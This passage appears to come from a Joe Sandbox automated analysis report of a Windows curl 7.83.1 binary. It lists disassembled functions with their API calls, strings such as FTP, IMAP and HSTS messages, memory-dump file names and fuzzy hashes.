                                        • Connection died, tried %d times before giving up, xrefs: 000EC759
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                        • Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd
                                        Similarity
                                        • API ID: free
                                        • String ID: Connection died, retrying a fresh connect (retry count: %d)$Connection died, tried %d times before giving up$REFUSED_STREAM, retrying a fresh connect
                                        • API String ID: 1294909896-4242497519
                                        • Opcode ID: dc7f47aa94a1590cb385e0daa8c29fe3f94d133539c3fdf5978ab0c905d4ff8c
                                        • Instruction ID: 1ffabfd854a54c14d0a361f1e9db4fa70a1afe6bde23890e617d878f1bae3c42
                                        • Opcode Fuzzy Hash: dc7f47aa94a1590cb385e0daa8c29fe3f94d133539c3fdf5978ab0c905d4ff8c
                                        • Instruction Fuzzy Hash: E3412A30708681AFFB19CB35D949FA4B7E1BF85314F1C0169E84C5B282DB72AC55CBA1
                                        APIs
                                          • Part of subcall function 000C3857: __stdio_common_vsscanf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,?,000000FF,?,00000000,?), ref: 000C3872
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00101B96
                                        Strings
                                        • OK [UIDVALIDITY %19[0123456789]], xrefs: 00101B68
                                        • Select failed, xrefs: 00101C32
                                        • Mailbox UIDVALIDITY has changed, xrefs: 00101BDE
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                        • Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd
                                        Similarity
                                        • API ID: __stdio_common_vsscanffree
                                        • String ID: Mailbox UIDVALIDITY has changed$OK [UIDVALIDITY %19[0123456789]]$Select failed
                                        • API String ID: 2458389622-3309259123
                                        • Opcode ID: d82bc3bbda53c65bee2e1556a6e72995097185288ec42cfae831cb12fdd0de29
                                        • Instruction ID: 2e70b217db832252955cd5bd7ac954a76fb5b987dc2c743dbf0d440e0cd8b706
                                        • Opcode Fuzzy Hash: d82bc3bbda53c65bee2e1556a6e72995097185288ec42cfae831cb12fdd0de29
                                        • Instruction Fuzzy Hash: 2B312770B44204EBDF18AF55E9429AD77FAFF88310F14403FE845A7282DBB8AC418B94
                                        APIs
                                        • ___from_strstr_to_strchr.LIBCMT ref: 000F0489
                                        • ___from_strstr_to_strchr.LIBCMT ref: 000F0499
                                        • ___from_strstr_to_strchr.LIBCMT ref: 000F04A8
                                        • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,000EA507), ref: 000F04DD
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                        • Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd
                                        Similarity
                                        • API ID: ___from_strstr_to_strchr$malloc
                                        • String ID:
                                        • API String ID: 383369926-0
                                        • Opcode ID: 83715063a901b46e2114ae59cc9c6c21e624b825c9df66b2446bc9e674c75986
                                        • Instruction ID: 8cd4a1643faf22ba0bf05e99aca179f7558e3307f0b4a3ee828e960937715831
                                        • Opcode Fuzzy Hash: 83715063a901b46e2114ae59cc9c6c21e624b825c9df66b2446bc9e674c75986
                                        • Instruction Fuzzy Hash: 8A1192E610935729EB651A34BC507F767C9DFD33D8F24002DE78187A83DE12AC066270
                                        APIs
                                        • fgets.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000100), ref: 000CD370
                                        • ___from_strstr_to_strchr.LIBCMT ref: 000CD386
                                        • ___from_strstr_to_strchr.LIBCMT ref: 000CD39C
                                        • fgets.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000100), ref: 000CD3DF
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                        • Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd
                                        Similarity
                                        • API ID: ___from_strstr_to_strchrfgets
                                        • String ID:
                                        • API String ID: 4248516992-0
                                        • Opcode ID: 690b7c3ec67bc203d1072e322cf88d9ec75baca3b141d91e67ff7b85fe58cb37
                                        • Instruction ID: 2faf434558913edc06e67af574c9951e0b557484c4cad1415f48f0c6c2b71f75
                                        • Opcode Fuzzy Hash: 690b7c3ec67bc203d1072e322cf88d9ec75baca3b141d91e67ff7b85fe58cb37
                                        • Instruction Fuzzy Hash: CB21E2759042199ADB28CF649C41BDAB3A8AF15340F0040FED585DB141EAB09FC48A60
                                        APIs
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 000C661C
                                        • _strdup.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 000C6636
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 000C6651
                                        • _strdup.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 000C666B
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                        • Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd
                                        Similarity
                                        • API ID: _strdupfree
                                        • String ID:
                                        • API String ID: 1865132094-0
                                        • Opcode ID: 39b45ee79df41ed916b593632b942461d266b92d7183948199c5f1ac96e04990
                                        • Instruction ID: 395db8ffa2eca37f09c537053d17d8cf9a8c473a673d6263116db3d2821f3909
                                        • Opcode Fuzzy Hash: 39b45ee79df41ed916b593632b942461d266b92d7183948199c5f1ac96e04990
                                        • Instruction Fuzzy Hash: F6217E755087829EC7708F388488FEEBBE46B57314F1D8E1EE89697680CB32D942CB45
                                        APIs
                                        • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,I32,00000003,?,000D0FFB,?,00000000,74F743D0,?,000D1589,?,?,?,?,00000000), ref: 000D0EE5
                                        • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,I64,00000003,?,?,?,?,?,?,?,?,?,00000000), ref: 000D0EFA
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                        • Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd
                                        Similarity
                                        • API ID: strncmp
                                        • String ID: I32$I64
                                        • API String ID: 1114863663-3980630743
                                        • Opcode ID: bd4b7a1c98cec94d211be1db03358243505b8cc1d1ca9b3268e9b4eaec26b4e1
                                        • Instruction ID: 6d2a0994425d35f7d3576e317ec2c32b996734c6da7003f824864803704f6d18
                                        • Opcode Fuzzy Hash: bd4b7a1c98cec94d211be1db03358243505b8cc1d1ca9b3268e9b4eaec26b4e1
                                        • Instruction Fuzzy Hash: A511B33A94475394DAF98B3C6AED7AB1AC6A702750F3806BBDD0CC5F69D141CE858073
                                        APIs
                                        • QueryPerformanceCounter.API-MS-WIN-CORE-PROFILE-L1-1-0(00000000,00000000,?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,000D24A8), ref: 000F4820
                                        • __alldvrm.LIBCMT ref: 000F4839
                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 000F4863
                                        • GetTickCount.API-MS-WIN-CORE-SYSINFO-L1-1-0(00000000,?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,000D24A8,00000000), ref: 000F4873
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                        • Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd
                                        Similarity
                                        • API ID: CountCounterPerformanceQueryTickUnothrow_t@std@@@__alldvrm__ehfuncinfo$??2@
                                        • String ID:
                                        • API String ID: 1296068966-0
                                        • Opcode ID: 99f8a759a9d9103863fb5373a950281168381aa3dc2b63a848dbc873366a0bda
                                        • Instruction ID: 0ea94f6e188f2c96a097fdefcfd4b46acb3d2b0b421dbdef8feffdba014c86df
                                        • Opcode Fuzzy Hash: 99f8a759a9d9103863fb5373a950281168381aa3dc2b63a848dbc873366a0bda
                                        • Instruction Fuzzy Hash: 7201C471A04204BFD715DFA4DC81B9E7BFAEB4C304F108079B508D7961D7329992D740
                                        APIs
                                        • QueryPerformanceCounter.API-MS-WIN-CORE-PROFILE-L1-1-0(?,?,?,?,?,?,000C10B6), ref: 000D028E
                                        • __alldvrm.LIBCMT ref: 000D02A7
                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 000D02D1
                                        • GetTickCount.API-MS-WIN-CORE-SYSINFO-L1-1-0(?,?,?,?,?,000C10B6), ref: 000D02DA
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                        • Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd
                                        Similarity
                                        • API ID: CountCounterPerformanceQueryTickUnothrow_t@std@@@__alldvrm__ehfuncinfo$??2@
                                        • String ID:
                                        • API String ID: 1296068966-0
                                        • Opcode ID: 5d6f4226dd8bde1489c2d6bee2f182ebcc93728ca18a9b1d069537386006b257
                                        • Instruction ID: 29e10b1b858c21d009c8187c1f72ccc13fcd7b6176325bf9e44c4dc75ba7c32c
                                        • Opcode Fuzzy Hash: 5d6f4226dd8bde1489c2d6bee2f182ebcc93728ca18a9b1d069537386006b257
                                        • Instruction Fuzzy Hash: 97F02872A05204BFD71997A4EC45FDA7ABEEB4C300F208239B208A79A1C7B24ED15760
                                        APIs
                                        • DeleteCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,000C8BF9,000E8B58,?,000E1E86,?,?,00000000), ref: 000E8889
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,000E1E86,?,?,00000000), ref: 000E889F
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,000E1E86,?,?,00000000), ref: 000E88B3
                                        • closesocket.WS2_32(000000FF), ref: 000E88CB
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                        • Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd
                                        Similarity
                                        • API ID: free$CriticalDeleteSectionclosesocket
                                        • String ID:
                                        • API String ID: 3086658127-0
                                        • Opcode ID: 8888bd14a6aa56e0de73cc326bcd9faedb522b8f7946bb5961a2f5e84733b4f8
                                        • Instruction ID: 5158da9092a83f19de714e22f0843e79a75142d0bf722dfa28ac7973f14f735a
                                        • Opcode Fuzzy Hash: 8888bd14a6aa56e0de73cc326bcd9faedb522b8f7946bb5961a2f5e84733b4f8
                                        • Instruction Fuzzy Hash: D3F04F35200912EFCB192B11EC0865CB762FF84721B14C13AF915539F0DF7018A2CB91
                                        APIs
                                        • _time64.API-MS-WIN-CRT-TIME-L1-1-0(00000000), ref: 000E6067
                                          • Part of subcall function 000EE9BE: inet_pton.WS2_32(00000002,?,?), ref: 000EE9D8
                                          • Part of subcall function 000EE9BE: inet_pton.WS2_32(00000017,?,?), ref: 000EE9E9
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                        • Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd
                                        Similarity
                                        • API ID: inet_pton$_time64
                                        • String ID: includesubdomains$max-age=
                                        • API String ID: 868955570-1235841791
                                        • Opcode ID: 117f4d7df1f33787a8ad102fb1755db9f7596e1d2fea590c7720639380d31d00
                                        • Instruction ID: fbb9d723a99acca4f4b463331d830607960364be881cc63462dc6034247a33d2
                                        • Opcode Fuzzy Hash: 117f4d7df1f33787a8ad102fb1755db9f7596e1d2fea590c7720639380d31d00
                                        • Instruction Fuzzy Hash: F2512A31F442E54FDB259A7AA8213FEB7E55F76390F2C509AD8D1B7383DA628C048790
                                        APIs
                                        • _strdup.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 000D00A4
                                          • Part of subcall function 000D20F5: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000001,?,?,?,000C8A7A,curl 7.83.1 (Windows) %s,00000000), ref: 000D2101
                                        Strings
                                        • %0*lu, xrefs: 000D0014
                                        • internal error: invalid pattern type (%d), xrefs: 000D0034
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                        • Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd
                                        Similarity
                                        • API ID: __acrt_iob_func_strdup
                                        • String ID: %0*lu$internal error: invalid pattern type (%d)
                                        • API String ID: 2404189530-449433499
                                        • Opcode ID: 6088335d46ac3e444b1bb706a417b5774f0be1a08c45f12eda278b1fa200c2d6
                                        • Instruction ID: de0c18b1e996b517610687ac698e44fd706a2514e27e7520ae8e78f9f43b06a2
                                        • Opcode Fuzzy Hash: 6088335d46ac3e444b1bb706a417b5774f0be1a08c45f12eda278b1fa200c2d6
                                        • Instruction Fuzzy Hash: 75518030604302ABCB59DF68C454BB9BFA1EF56304F2884AED4998B343D672D943DB62
                                        APIs
                                        • ___from_strstr_to_strchr.LIBCMT ref: 000FC351
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                        • Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd
                                        Similarity
                                        • API ID: ___from_strstr_to_strchr
                                        • String ID: Content-Length: %I64d$The file does not exist
                                        • API String ID: 601868998-3816122970
                                        • Opcode ID: 22978415e7eba51dacbd328f47ee3b5ac4d4253d0e1ea98018a1e359ee637223
                                        • Instruction ID: ce62ecf8063a10916205128511047c6c57861c7b8468c3bb0ac2bb63780b9ffc
                                        • Opcode Fuzzy Hash: 22978415e7eba51dacbd328f47ee3b5ac4d4253d0e1ea98018a1e359ee637223
                                        • Instruction Fuzzy Hash: BB318C7170430C5BF638962C9993FBF73CA9FD1360F24852BFA5586AC3DA70AD4051A2
                                        APIs
                                        • strtoul.API-MS-WIN-CRT-CONVERT-L1-1-0(00000000,?,00000000,00000000,00000000,?,?,?,?,?,?,?,000D5BA6,00000001), ref: 000D5428
                                        • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,000D5BA6,00000001), ref: 000D543B
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                        • Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd
                                        Similarity
                                        • API ID: _errnostrtoul
                                        • String ID: %u.%u.%u.%u
                                        • API String ID: 660391088-1542503432
                                        • Opcode ID: d4c0b42f5add0dd684d1f73834b0336998c8ce5abf782d20624f5615e3af754d
                                        • Instruction ID: 6e3cd4c0f4368ea4da67b2e5df00e0daa255802902fc1ff111a180f2d04cd461
                                        • Opcode Fuzzy Hash: d4c0b42f5add0dd684d1f73834b0336998c8ce5abf782d20624f5615e3af754d
                                        • Instruction Fuzzy Hash: 80412571C00B06ABDB26AAA4FC244BEB7F6EB09357F10403BE815A2381D2758A81D771
                                        APIs
                                        • WSAGetLastError.WS2_32(?,?,?,?,?,?,?,?,?,?,?,?,000FA3DE,?), ref: 000FA6FF
                                        Strings
                                        • FTP response aborted due to select/poll error: %d, xrefs: 000FA706
                                        • FTP response timeout, xrefs: 000FA720
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                        • Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd
                                        Similarity
                                        • API ID: ErrorLast
                                        • String ID: FTP response aborted due to select/poll error: %d$FTP response timeout
                                        • API String ID: 1452528299-4057338436
                                        • Opcode ID: 764b6c842c9ce453ffeea26aeb0c3919fa94290985c7e86a48437cd271e38716
                                        • Instruction ID: a8bf468440c02a57881e3a78b54067f06a036248c8872ce0d034405bff185c6d
                                        • Opcode Fuzzy Hash: 764b6c842c9ce453ffeea26aeb0c3919fa94290985c7e86a48437cd271e38716
                                        • Instruction Fuzzy Hash: BB41C4B4F0030E9FDF18DB55C851ABEB7F1BF96314F288169D509E7681E7305A02AB92
                                        APIs
                                        • fputs.API-MS-WIN-CRT-STDIO-L1-1-0(?,?), ref: 000D04E3
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                        • Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd
                                        Similarity
                                        • API ID: fputs
                                        • String ID: "%s":$"%s":null
                                        • API String ID: 1795875747-2759546026
                                        • Opcode ID: 159fd34d876cdcddf86e991903c7ad18ee63bcfbe8cb2daaa237987477014c63
                                        • Instruction ID: 3f038b58769570cbe6456e8d6fc9619dd6fef646606ca894af772265605387b3
                                        • Opcode Fuzzy Hash: 159fd34d876cdcddf86e991903c7ad18ee63bcfbe8cb2daaa237987477014c63
                                        • Instruction Fuzzy Hash: CD3166B0A00309EFDF24DF55C945FAA77E9AFA0310F54841AEA0987751E374EE90DB61
                                        APIs
                                        • fputs.API-MS-WIN-CRT-STDIO-L1-1-0(00116C88,00000000,00000000,?,?,00000000,?,000D07A5,?,?), ref: 000D096B
                                        • fputs.API-MS-WIN-CRT-STDIO-L1-1-0(001207BC,00000000), ref: 000D09AF
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                        • Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd
                                        Similarity
                                        • API ID: fputs
                                        • String ID: "curl_version":
                                        • API String ID: 1795875747-1127485152
                                        • Opcode ID: bb0a6c0163c3fbf1fc55bf1fb820388cb397cd4f5e3278323482d1009add6583
                                        • Instruction ID: 68093899f4760368e319db03d34fb42aa7a44cd6cfcba3317dffeb72facc94cb
                                        • Opcode Fuzzy Hash: bb0a6c0163c3fbf1fc55bf1fb820388cb397cd4f5e3278323482d1009add6583
                                        • Instruction Fuzzy Hash: 61010832218310AFF7081B51BC46BEA77CDDF84775F20412FF50886292EFB258408674
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                        • Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd
                                        Similarity
                                        • API ID: ErrorLastrecv
                                        • String ID: Recv failure: %s
                                        • API String ID: 2514157807-4276829032
                                        • Opcode ID: 3cb370ec999a902caca8e1d5e5d3547ab4599061d046af73ebdc91a96cc6209f
                                        • Instruction ID: b7667dcc0c5cec1e877555712f5673a2624d105f0c4c465879ad5cc356fa2701
                                        • Opcode Fuzzy Hash: 3cb370ec999a902caca8e1d5e5d3547ab4599061d046af73ebdc91a96cc6209f
                                        • Instruction Fuzzy Hash: 7D11B171A003089BCB259F24DC46BEAB7F5FF88320F1005AFF94597391D7B1A9918BA0
                                        APIs
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 000C7E0E
                                        • _strdup.API-MS-WIN-CRT-STRING-L1-1-0 ref: 000C7E20
                                        Strings
                                        • -v, --verbose overrides an earlier trace/verbose option, xrefs: 000C7E3D
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                        • Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd
                                        Similarity
                                        • API ID: _strdupfree
                                        • String ID: -v, --verbose overrides an earlier trace/verbose option
                                        • API String ID: 1865132094-440421925
                                        • Opcode ID: 344897786e9150eeba33973cdf120eec9ab0494f455072c97064f269a7d1288e
                                        • Instruction ID: 6e8fc722b0004b19d9b894e4e04fef70feaeea7de83a4057318e2e1673609249
                                        • Opcode Fuzzy Hash: 344897786e9150eeba33973cdf120eec9ab0494f455072c97064f269a7d1288e
                                        • Instruction Fuzzy Hash: 4F11E77560C742DFC759CF348805BAEB7E0BB4A315F184A5EE49997580DB3098C18B82
                                        APIs
                                        • getsockopt.WS2_32(?,0000FFFF,00001001,00000000,00000004), ref: 000DEE2C
                                        • setsockopt.WS2_32(?,0000FFFF,00001001,00004020,00000004), ref: 000DEE4B
                                          • Part of subcall function 000D0B38: GetModuleHandleA.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(ntdll,RtlVerifyVersionInfo), ref: 000D0B6D
                                          • Part of subcall function 000D0B38: GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(00000000), ref: 000D0B74
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
